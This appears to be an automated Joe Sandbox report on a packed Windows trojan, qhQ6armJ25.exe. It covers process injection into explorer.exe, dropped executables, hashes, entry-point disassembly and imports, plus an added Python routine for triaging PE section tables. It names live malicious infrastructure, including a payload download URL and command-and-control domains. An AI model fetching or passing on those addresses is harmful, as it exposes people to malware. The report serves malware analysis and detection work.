            Default Accounts | Exploitation for Client Execution 1 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 12 | LSASS Memory | Security Software Discovery 321 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Virtualization/Sandbox Evasion 12 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 124 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Hidden Files and Directories 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 2 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Information Discovery 4 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            Behavior Graph ID: 528745, Sample: qhQ6armJ25.exe, Start date: 25/11/2021, Architecture: WINDOWS, Score: 100

            Signatures on the sample: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; 5 other signatures

            Process tree (graph node numbers in parentheses):
            • qhQ6armJ25.exe (9, started)
              • qhQ6armJ25.exe (14, started): Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
                • explorer.exe (19, injected): DNS/IP: xacokuo80.top 212.192.241.249 (ports 49714, 49715, 49716; RAPMSB-ASRU, Russian Federation), privacytoolzfor-you7000.top, nalirou70.top; dropped: C:\Users\user\AppData\Roaming\gahfeaj (PE32), C:\Users\user\AppData\Local\Temp\D380.exe (PE32), C:\Users\user\...\gahfeaj:Zone.Identifier (ASCII); signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
                  • D380.exe (24, started): Machine Learning detection for dropped file; Contains functionality to inject code into remote processes; Injects a PE file into a foreign process
                    • D380.exe (27, started)
            • gahfeaj (11, started): Machine Learning detection for dropped file
              • gahfeaj (17, started): Creates a thread in another existing process (thread injection)

            Screenshots


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            qhQ6armJ25.exe | 45% | Virustotal |
            qhQ6armJ25.exe | 100% | Joe Sandbox ML |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\gahfeaj | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\D380.exe | 100% | Joe Sandbox ML |

            Unpacked PE Files

            Source | Detection | Scanner | Label
            5.1.gahfeaj.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            5.2.gahfeaj.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.0.qhQ6armJ25.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.1.D380.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            5.0.gahfeaj.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            4.2.D380.exe.1d215a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.2.D380.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.0.D380.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.0.D380.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.1.qhQ6armJ25.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.0.D380.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.2.qhQ6armJ25.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.0.qhQ6armJ25.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            3.2.gahfeaj.1d715a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            5.0.gahfeaj.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.0.qhQ6armJ25.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            5.0.gahfeaj.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            0.2.qhQ6armJ25.exe.1d715a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

            Domains

            Source | Detection | Scanner | Label
            privacytoolzfor-you7000.top | 6% | Virustotal |
            xacokuo80.top | 8% | Virustotal |
            nalirou70.top | 11% | Virustotal |

            URLs

            Source | Detection | Scanner | Label
            http://xacokuo80.top/ | 8% | Virustotal |
            http://xacokuo80.top/ | 0% | Avira URL Cloud | safe
            http://nalirou70.top/ | 100% | Avira URL Cloud | phishing
            http://privacytoolzfor-you7000.top/downloads/toolspab2.exe | 100% | Avira URL Cloud | malware

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            privacytoolzfor-you7000.top | 212.192.241.249 | true | true | | unknown
            xacokuo80.top | 212.192.241.249 | true | true | | unknown
            nalirou70.top | unknown | unknown | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://xacokuo80.top/ | true | 8%, Virustotal; Avira URL Cloud: safe | unknown
            http://nalirou70.top/ | true | Avira URL Cloud: phishing | unknown
            http://privacytoolzfor-you7000.top/downloads/toolspab2.exe | true | Avira URL Cloud: malware | unknown

            Contacted IPs


            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            212.192.241.249 | privacytoolzfor-you7000.top | Russian Federation | 61269 | RAPMSB-ASRU | true

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:528745
            Start date:25.11.2021
            Start time:18:22:55
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 7m 24s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:qhQ6armJ25.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of new started processes analysed:6
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@10/3@10/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 74.3% (good quality ratio 59.9%)
            • Quality average: 52.2%
            • Quality standard deviation: 35.3%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.

            Simulations

            Behavior and APIs

            Time | Type | Description
            18:24:50 | Task Scheduler | Run new task: Firefox Default Browser Agent 944D867DB154EF14 path: C:\Users\user\AppData\Roaming\gahfeaj

            Joe Sandbox View / Context

            IPs

            Match | Associated Sample Name / URL | Detection | Context
            212.192.241.249 | ttY1E1yC3m.exe | malicious | file-file-host4.com/tratata.php
            212.192.241.249 | EUMeloHpr7.exe | malicious | file-file-host4.com/tratata.php
            212.192.241.249 | yH8giB6jJ2.exe | malicious | xacokuo80.top/

            Domains


            ASN


            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Temp\D380.exe
            Process:C:\Windows\explorer.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:modified
            Size (bytes):302592
            Entropy (8bit):5.813051493235412
            Encrypted:false
            SSDEEP:6144:8eWWd3GjRD8vAZvXJSXuZet0yS8Y48PGvx/6h:o63GwAZPJSXuZet0yS8YYvx/
            MD5:61BA8F1EDCD03481D6447E8EC34DC383
            SHA1:70B3702ECBCF7FF81C9C93CAAA5C1220DDCE0931
            SHA-256:C1233AC55E45B60D50326C3E3380DA5A7F5EA83ED5E9E93EB99D0DEC01E5004F
            SHA-512:6AE1F2501094CE91205945665726317E3E18116684D2975C9C5C575519D33E00B4E3A0BA1C5329BC7F34819A736CEFFEC75DCE383EF8C7A798F93886F11073E7
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Reputation:low
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...p...p..Sp...p..fp...p..ap...pRich...p........PE..L...*}._......................|..... |....... ....@.................................k,..........................................x....p~..g....................~..... ...............................Hz..@............................................text...(........................... ..`.data....A{.. ......................@....rsrc....g...p~..h... ..............@..@.reloc........~.....................@..B................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\gahfeaj
            Process:C:\Windows\explorer.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):304128
            Entropy (8bit):5.823579577144565
            Encrypted:false
            SSDEEP:6144:QSzvF8GFy9eGzktM61i2hIaVSXuZet0yy8Eo10gytXunKdi:7zg93zH2h7VSXuZet0yy8E2yt/d
            MD5:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            SHA1:AFAF20C658C307F53E804639710C2DCE09E9C3BA
            SHA-256:5231916FBEB9C166A9BBB4E7C576B210019A3A84C17CBE777CB099AB3AAD5DD8
            SHA-512:B94F6706AC60C695C5CB38897381A062BF20801568EE0A12BCDF14BC8FC0340BDC5F29CFDDCB922958C5E6631DE085D7B3C5B98CD79A2ABA6AA2B3DB9634C094
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Reputation:low
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...pa..p..Sp...p..fp...p..ap...pRich...p........PE..L...[S;`......................|..... ........ ....@.................................j...........................................x....p~..h....................~.....................................P...@............................................text............................... ..`.data....A{.. ......................@....rsrc....h...p~..j...$..............@..@.reloc..<.....~.....................@..B................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\gahfeaj:Zone.Identifier
            Process:C:\Windows\explorer.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Reputation:high, very likely benign file
            Preview: [ZoneTransfer]....ZoneId=0

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.823579577144565
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:qhQ6armJ25.exe
            File size:304128
            MD5:9953acb0fee6c45fc5aa12d21ac3ad1b
            SHA1:afaf20c658c307f53e804639710c2dce09e9c3ba
            SHA256:5231916fbeb9c166a9bbb4e7c576b210019a3a84c17cbe777cb099ab3aad5dd8
            SHA512:b94f6706ac60c695c5cb38897381a062bf20801568ee0a12bcdf14bc8fc0340bdc5f29cfddcb922958c5e6631de085d7b3c5b98cd79a2aba6aa2b3db9634c094
            SSDEEP:6144:QSzvF8GFy9eGzktM61i2hIaVSXuZet0yy8Eo10gytXunKdi:7zg93zH2h7VSXuZet0yy8E2yt/d
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...pa..p..Sp...p..fp...p..ap...pRich...p........PE..L...[S;`...................

            File Icon

            Icon Hash:b2e8e8e8a2a2a488

            Static PE Info

            General

            Entrypoint:0x418120
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
            Time Stamp:0x603B535B [Sun Feb 28 08:24:59 2021 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:ee6524c22cc0cf74d4c47508c44cd3e2

            Entrypoint Preview

            Instruction
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007F537CE15AEBh
            call 00007F537CE157F6h
            pop ebp
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            mov edi, edi
            push ebp
            mov ebp, esp
            push FFFFFFFEh
            push 0042FDE0h
            push 0041C340h
            mov eax, dword ptr fs:[00000000h]
            push eax
            add esp, FFFFFF98h
            push ebx
            push esi
            push edi
            mov eax, dword ptr [00432064h]
            xor dword ptr [ebp-08h], eax
            xor eax, ebp
            push eax
            lea eax, dword ptr [ebp-10h]
            mov dword ptr fs:[00000000h], eax
            mov dword ptr [ebp-18h], esp
            mov dword ptr [ebp-70h], 00000000h
            lea eax, dword ptr [ebp-60h]
            push eax
            call dword ptr [00401314h]
            cmp dword ptr [01BE51BCh], 00000000h
            jne 00007F537CE157F0h
            push 00000000h
            push 00000000h
            push 00000001h
            push 00000000h
            call dword ptr [00401310h]
            call 00007F537CE15973h
            mov dword ptr [ebp-6Ch], eax
            call 00007F537CE1993Bh
            test eax, eax
            jne 00007F537CE157ECh
            push 0000001Ch
            call 00007F537CE15930h
            add esp, 04h
            call 00007F537CE19298h
            test eax, eax
            jne 00007F537CE157ECh
            push 00000010h
            call 00007F537CE1591Dh
            add esp, 04h
            push 00000001h
            call 00007F537CE191E3h
            add esp, 04h
            call 00007F537CE16E9Bh
            mov dword ptr [ebp-04h], 00000000h
            call 00007F537CE16A7Fh
            test eax, eax

            Rich Headers

            Programming Language:
            • [LNK] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [C++] VS2010 build 30319
            • [RES] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729

            Data Directories

            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x303c4 | 0x78 | .text
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17e7000 | 0x68b0 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x17ee000 | 0x17cc | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x1c | .text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x17f50 | 0x40 | .text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x3c4 | .text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

            Sections

            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x30ae2 | 0x30c00 | False | 0.609615384615 | data | 7.04028491917 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data | 0x32000 | 0x17b41c0 | 0x1400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc | 0x17e7000 | 0x68b0 | 0x6a00 | False | 0.529407429245 | data | 5.46609013529 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0x17ee000 | 0x1143c | 0x11600 | False | 0.0750196717626 | data | 0.974071358106 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
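
The section table above is the main static clue to how this sample unpacks. As an added example that is not part of the Joe Sandbox report or of the sample, the Python below serialises the four rows into 40-byte IMAGE_SECTION_HEADER records, parses them back, and applies the checks an analyst runs on a section table: a VirtualSize far above SizeOfRawData (.data reserves 0x17b41c0 bytes, about 24 MB, for 0x1400 bytes on disk; the zero-filled remainder is the kind of region an in-memory unpacker typically writes into), sections that are both writable and executable, and high entropy in an executable section (.text at 7.04). It also computes SizeOfImage from the last section and decodes the 0x603B535B link timestamp from the Static PE Info. The PointerToRawData values are assumed (the report does not list them) and the entropy figures are transcribed from the table, not computed.

```python
import struct
from datetime import datetime, timezone

# IMAGE_SECTION_HEADER characteristic flags (subset used here)
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE      = 0x02000000
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000

# Rows transcribed from the report's Sections table:
# (name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics)
REPORT_SECTIONS = [
    (".text",  0x1000,    0x30ae2,   0x30c00, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ),
    (".data",  0x32000,   0x17b41c0, 0x1400,  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ),
    (".rsrc",  0x17e7000, 0x68b0,    0x6a00,  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".reloc", 0x17ee000, 0x1143c,   0x11600, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ),
]
# Entropy per section as reported (none given for .data); transcribed input, not computed here.
REPORT_ENTROPY = {".text": 7.04028491917, ".rsrc": 5.46609013529, ".reloc": 0.974071358106}

# 40 bytes: Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"

def build_section_table(rows, first_raw_offset=0x400):
    """Serialise rows as raw section headers; raw data is laid out back to back
    from first_raw_offset (assumed, the report lists no PointerToRawData)."""
    blob, raw_ptr = b"", first_raw_offset
    for name, va, vsize, rawsize, chars in rows:
        blob += struct.pack(SECTION_HEADER_FMT, name.encode("ascii").ljust(8, b"\0"),
                            vsize, va, rawsize, raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += rawsize
    return blob

def parse_section_table(blob, count):
    """Decode count IMAGE_SECTION_HEADER records from blob."""
    sections = []
    for i in range(count):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack(
            SECTION_HEADER_FMT, blob[i * 40:(i + 1) * 40])
        sections.append({"name": name.rstrip(b"\0").decode("ascii"),
                         "virtual_address": va, "virtual_size": vsize,
                         "raw_size": rawsize, "raw_pointer": rawptr, "characteristics": chars})
    return sections

def triage_sections(sections, entropy, max_ratio=8, entropy_threshold=6.5):
    """Return (section name, reason) findings for the usual section-table checks."""
    findings = []
    for s in sections:
        name, chars = s["name"], s["characteristics"]
        # Large virtual size with little raw data: the loader zero-fills the rest,
        # which is what an in-place unpacker needs as its decryption buffer.
        if s["raw_size"] == 0 or s["virtual_size"] / s["raw_size"] > max_ratio:
            findings.append((name, "virtual size %#x vs raw size %#x" % (s["virtual_size"], s["raw_size"])))
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append((name, "writable and executable"))
        if chars & IMAGE_SCN_MEM_EXECUTE and entropy.get(name, 0.0) >= entropy_threshold:
            findings.append((name, "executable section entropy %.2f (packed or encrypted code)" % entropy[name]))
    return findings

def image_size(sections, section_alignment=0x1000):
    """SizeOfImage as the loader computes it: end of the last section, rounded up."""
    last = max(sections, key=lambda s: s["virtual_address"])
    end = last["virtual_address"] + last["virtual_size"]
    return (end + section_alignment - 1) // section_alignment * section_alignment

def decode_timestamp(ts):
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch, UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)

if __name__ == "__main__":
    secs = parse_section_table(build_section_table(REPORT_SECTIONS), len(REPORT_SECTIONS))
    for name, reason in triage_sections(secs, REPORT_ENTROPY):
        print("%-7s %s" % (name, reason))
    print("SizeOfImage %#x for a %d-byte file" % (image_size(secs), 304128))
    print("link time", decode_timestamp(0x603B535B).strftime("%a %b %d %H:%M:%S %Y UTC"))
```

Run stand-alone it reports .text (entropy) and .data (virtual/raw ratio), a SizeOfImage of 0x1800000 for a 304128-byte file, and the same link time the report prints.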

            Resources

            Name | RVA | Size | Type | Language | Country
            AFX_DIALOG_LAYOUT | 0x17eb820 | 0x2 | data | Divehi; Dhivehi; Maldivian | Maldives
            YONAMIKORUFENI | 0x17ea8c0 | 0xee8 | ASCII text, with very long lines, with no line terminators | Spanish | Panama
            RT_CURSOR | 0x17eb828 | 0x130 | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_CURSOR | 0x17eb958 | 0xf0 | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_CURSOR | 0x17eba48 | 0x10a8 | dBase III DBT, version number 0, next free block index 40 | Divehi; Dhivehi; Maldivian | Maldives
            RT_ICON | 0x17e74f0 | 0x8a8 | data | Spanish | Panama
            RT_ICON | 0x17e7d98 | 0x6c8 | data | Spanish | Panama
            RT_ICON | 0x17e8460 | 0x568 | GLS_BINARY_LSB_FIRST | Spanish | Panama
            RT_ICON | 0x17e89c8 | 0x10a8 | data | Spanish | Panama
            RT_ICON | 0x17e9a70 | 0x988 | data | Spanish | Panama
            RT_ICON | 0x17ea3f8 | 0x468 | GLS_BINARY_LSB_FIRST | Spanish | Panama
            RT_STRING | 0x17ecc50 | 0xfc | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_STRING | 0x17ecd50 | 0x252 | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_STRING | 0x17ecfa8 | 0x458 | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_STRING | 0x17ed400 | 0x25c | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_STRING | 0x17ed660 | 0x24a | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_ACCELERATOR | 0x17eb7a8 | 0x78 | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_GROUP_CURSOR | 0x17ecaf0 | 0x30 | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_GROUP_ICON | 0x17ea860 | 0x5a | data | Spanish | Panama
            RT_VERSION | 0x17ecb20 | 0x12c | data | Divehi; Dhivehi; Maldivian | Maldives

            Imports

            DLL | Import
            KERNEL32.dll | UnregisterWait, SetCriticalSectionSpinCount, HeapCompact, lstrcmpA, FindFirstFileW, FindFirstChangeNotificationW, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, SetErrorMode, FindResourceW, SetUnhandledExceptionFilter, LoadLibraryExW, SetDllDirectoryW, InterlockedIncrement, GetQueuedCompletionStatus, VerSetConditionMask, ReadConsoleA, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, WritePrivateProfileSectionA, SetDefaultCommConfigW, SetFirmwareEnvironmentVariableA, CreateJobObjectW, GlobalLock, AddConsoleAliasW, SetVolumeMountPointW, GetComputerNameW, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, _lclose, GetModuleHandleW, GetTickCount, GetCommConfig, CreateNamedPipeW, GetProcessHeap, IsBadReadPtr, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetConsoleTitleA, CreateRemoteThread, GetCompressedFileSizeW, EnumTimeFormatsA, SetCommState, GetSystemWow64DirectoryA, CreateActCtxW, WaitForMultipleObjectsEx, InitializeCriticalSection, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, OpenProcess, FindResourceExA, FatalAppExitW, GetThreadSelectorEntry, GetCalendarInfoW, GetCalendarInfoA, ReadFileScatter, SetSystemTimeAdjustment, GetSystemWindowsDirectoryA, ReadConsoleOutputW, SetConsoleCP, DeleteVolumeMountPointW, InterlockedPopEntrySList, GetFileAttributesA, lstrcpynW, SetConsoleMode, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, VerifyVersionInfoA, TerminateProcess, GetAtomNameW, IsDBCSLeadByte, GetModuleFileNameW, lstrcatA, QueryInformationJobObject, GetBinaryTypeW, GetVolumePathNameA, lstrlenW, GetPrivateProfileSectionNamesW, GlobalUnlock, VirtualUnlock, GetTempPathW, GetStringTypeExA, GetNamedPipeHandleStateW, GetLargestConsoleWindowSize, GetPrivateProfileIntW, 
VerifyVersionInfoW, InterlockedExchange, ReleaseActCtx, SetCurrentDirectoryA, GetStdHandle, FindFirstFileA, FreeLibraryAndExitThread, GetLastError, ChangeTimerQueueTimer, BackupRead, BindIoCompletionCallback, GetProcAddress, GetLongPathNameA, HeapSize, CreateJobSet, LocalLock, LockFileEx, EnterCriticalSection, VerLanguageNameW, SearchPathA, BuildCommDCBW, FindClose, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, LocalAlloc, MoveFileA, BuildCommDCBAndTimeoutsW, GetExitCodeThread, GetNumberFormatW, SetCurrentDirectoryW, SetFileApisToANSI, QueryDosDeviceW, HeapWalk, GetPrivateProfileStructA, GetTapeParameters, SetNamedPipeHandleState, SetEnvironmentVariableA, GetVolumePathNamesForVolumeNameA, GetDefaultCommConfigA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, WaitCommEvent, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, IsDebuggerPresent, FatalExit, FreeEnvironmentStringsW, EnumResourceNamesA, FindNextFileW, WriteProfileStringW, VirtualProtect, EnumDateFormatsW, CompareStringA, FatalAppExitA, PeekConsoleInputA, DeleteCriticalSection, WriteConsoleOutputAttribute, OutputDebugStringA, DuplicateHandle, FindFirstVolumeA, GetVersionExA, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, ReadConsoleOutputCharacterW, TlsFree, GetProfileSectionW, EnumSystemLocalesW, lstrcpyW, CopyFileExA, LocalFileTimeToFileTime, CreateFileW, SetStdHandle, GetFullPathNameA, GetThreadContext, WritePrivateProfileStringW, ExitProcess, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, DecodePointer, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, HeapValidate, EncodePointer, SetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, 
LeaveCriticalSection, LoadLibraryW, GetCurrentProcess, UnhandledExceptionFilter, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers
            USER32.dll | GetMessageTime
            GDI32.dll | GetBitmapBits
